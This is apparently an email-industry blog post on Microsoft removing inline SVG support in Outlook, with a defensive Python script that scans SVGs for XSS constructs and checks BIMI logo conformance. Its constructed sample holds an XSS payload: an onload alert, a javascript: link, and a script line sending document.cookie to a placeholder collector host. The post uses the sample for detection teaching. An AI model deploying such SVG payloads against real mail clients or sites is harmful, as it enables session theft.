Microsoft is pulling support for inline SVG images
Microsoft is removing support for inline SVG images in Outlook for Web and Outlook for Windows. This started rolling out in early September and should hit everyone by mid October. BleepingComputer has the full writeup here.
Email designers and coders, be aware. That said, I suspect only a tiny fraction of email designers were building emails that used inline SVG images; Microsoft says less than 0.1 percent of images fall into this bucket. Most ESPs and most templates stick to PNGs and JPGs, so the impact on non-malicious senders is likely minimal.
What is SVG, anyway?
SVG (Scalable Vector Graphics) images are graphics defined in text, using XML. Instead of storing pixels, an SVG stores shapes, paths, lines, curves, and text as math. Open your favorite SVG image in a text editor and you'll see almost-human-readable data, a series of instructions that describe how to draw the image. It reminds me a bit of PostScript, the Adobe language that drove the growth of desktop publishing and laser printing in the 1990s. Different code, different instructions, different focus – but both can be opened in an editor, reviewed, and tweaked, if you've got the right kind of expertise.
Why Microsoft Removed Support
The reason for the change: attackers found creative ways to abuse SVG in Outlook. Because an SVG file is XML, it can carry a script element, event-handler attributes such as onload, and embedded foreign content (a foreignObject wrapping arbitrary HTML, or links that pull in external resources), and the bad guys have taken advantage of that. Microsoft says this update helps block XSS-style attacks that were being delivered through these images.
If you were one of the rare senders experimenting with inline SVG, you'll now see a blank space where your graphic used to be. SVG images as attached files remain untouched. The block only applies to inline rendering inside the message body.
What about BIMI logos?
The Brand Indicators for Message Identification (BIMI) logo standard also uses SVG, but in a restricted form: the SVG Tiny Portable/Secure profile (SVG Tiny PS, declared in the file as baseProfile="tiny-ps"). It is a simplified subset that drops the riskier parts of full SVG: no scripts, no external references, no embedded HTML or images, no animation. And the broader mailbox requirements for BIMI logos call for a CMC (Common Mark Certificate) or VMC (Verified Mark Certificate), which go through a validation process to confirm, among other things, that the logo file conforms to that restricted profile and doesn't contain anything unsafe.
So while BIMI also uses SVG as the format for email sender logos, nobody is using certified BIMI logos as an attack vector, and this latest Microsoft news has no impact on or intersection with BIMI.
And note that while Microsoft does not currently support BIMI logos, even if it did, the BIMI logo is not rendered in the email body; it is typically displayed as a separate element, outside the body of the message, next to the sender name.
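To make the two points above concrete, the script below (an added example for this post, not Microsoft's or the BIMI Group's code) walks an SVG document and flags the constructs that turn an "image" into an XSS carrier, then checks the same document against the SVG Tiny PS rules a BIMI logo must satisfy. Both sample documents are constructed for the demo, the collector.example hostname is made up, and the profile checks cover only the requirements I am confident of (version, baseProfile, a title element, no image element, plus everything the XSS triage flags); the full profile has further restrictions this example does not enumerate.

```python
"""Triage an SVG for the constructs that make inline SVG risky in a mail
client, then check it against the BIMI logo profile.

Added example for this post; not Microsoft's, Outlook's or the BIMI Group's
code.  The two sample documents below are constructed for the demo.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that execute code or change the document after it loads:
# <script> runs JavaScript, <foreignObject> wraps arbitrary HTML, and
# <set>/<animate> can rewrite attributes (including href) at runtime.
RISKY_ELEMENTS = {"script", "foreignObject", "set", "animate", "animateTransform"}

# Constructed: an "image" that is really a payload carrier.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>fetch('https://collector.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">Open</text></a>
  <foreignObject width="200" height="50">
    <body xmlns="http://www.w3.org/1999/xhtml"><p>inline HTML</p></body>
  </foreignObject>
  <image xlink:href="https://collector.example/pixel.png" width="1" height="1"/>
</svg>"""

# Constructed: a logo written the way a BIMI (SVG Tiny PS) file must be.
CLEAN_LOGO = """<svg xmlns="http://www.w3.org/2000/svg" version="1.2"
     baseProfile="tiny-ps" viewBox="0 0 100 100">
  <title>Example Corp</title>
  <circle cx="50" cy="50" r="40" fill="#0057b8"/>
  <path d="M30 50 L70 50" stroke="#ffffff" stroke-width="8"/>
</svg>"""


def local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def scan_svg(svg_text):
    """Return findings (in document order) for constructs a mail client should
    never execute or fetch.  This is triage, not a sanitizer: it does not try
    to handle every browser-side obfuscation of 'javascript:'."""
    # Parse untrusted XML with defusedxml in production; the stdlib parser is
    # used here so the example runs without dependencies.
    root = ET.fromstring(svg_text)
    findings = []
    for el in root.iter():
        name = local(el.tag)
        if name in RISKY_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = local(attr)          # catches href and xlink:href alike
            if aname.startswith("on"):   # onload, onclick, onerror, ...
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href":
                v = value.strip().lower()
                if v.startswith("javascript:"):
                    findings.append(f"script URL in href on <{name}>")
                elif v.startswith(("http:", "https:", "//")):
                    findings.append(f"external reference in href on <{name}>")
                elif v.startswith("data:"):
                    findings.append(f"embedded data: URL in href on <{name}>")
    return findings


def bimi_profile_problems(svg_text):
    """Check SVG Tiny PS requirements a BIMI logo must meet.  The four
    structural rules below are the ones I am confident of; the full profile
    has further restrictions (animation, external resources, attributes on
    the root element) that this example does not enumerate."""
    root = ET.fromstring(svg_text)
    if local(root.tag) != "svg":
        return ["root element is not <svg>"]
    problems = []
    if root.get("version") != "1.2":
        problems.append('version must be "1.2"')
    if root.get("baseProfile") != "tiny-ps":
        problems.append('baseProfile must be "tiny-ps"')
    if root.find(f"{{{SVG_NS}}}title") is None:
        problems.append("missing <title>")
    if any(local(el.tag) == "image" for el in root.iter()):
        problems.append("<image> element is not allowed")
    # Everything the XSS triage flags is also forbidden by the profile.
    problems.extend(scan_svg(svg_text))
    return problems


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("logo", CLEAN_LOGO)):
        print(label, "findings:", scan_svg(doc))
        print(label, "BIMI problems:", bimi_profile_problems(doc))
```

Run it and the constructed payload produces five findings (the onload handler, the script element, the javascript: link, the foreignObject, and the external image fetch), while the tiny-ps logo produces none and passes the profile check. The useful takeaway for a mail-side filter is the asymmetry: a conformant BIMI logo has nothing to flag, whereas anything an attacker would bother sending inline trips several of these checks at once.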
If you're in the email design world and relying on inline SVG for icons, logos, or UI elements in your template, it's time to switch those to PNG, GIF or JPG. For anyone else? Nothing to see here.